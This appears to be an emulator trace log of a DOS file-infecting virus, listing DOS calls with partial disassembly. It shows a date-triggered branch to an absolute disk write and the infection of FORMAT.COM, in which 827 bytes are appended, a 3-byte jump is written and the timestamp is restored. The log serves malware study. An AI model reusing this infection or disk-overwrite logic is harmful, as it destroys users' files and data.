2018-12-25T11:46:33.824731474Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.828123192Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
0x12ab6: jmp 0x12a85
0x12ab8: mov ah, 9
0x12aba: mov dx, si
0x12abc: add dx, 0x41
0x12abf: nop
0x12ac0: int 0x21
0x12ac2: cmp byte ptr [si], 0x1a
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100
0x12ad1: mov dx, 0
0x12ad4: mov bx, 1
0x12ad7: int 0x26
2018-12-25T11:46:33.831398034Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-25T11:46:33.833952801Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.836791903Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.838837975Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.850962143Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.853717789Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.857028252Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.859701497Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.862301589Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.865220171Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.867825675Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.870300191Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.873215471Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.878866471Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.882203942Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.88914963Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.483365866Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.490926649Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.492549058Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:34.496441855Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.502243883Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.503605452Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.511911319Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.513260876Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.516142927Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.518256021Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.525142802Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.535712876Z 26 PC: 12c91 | Set disk transfer address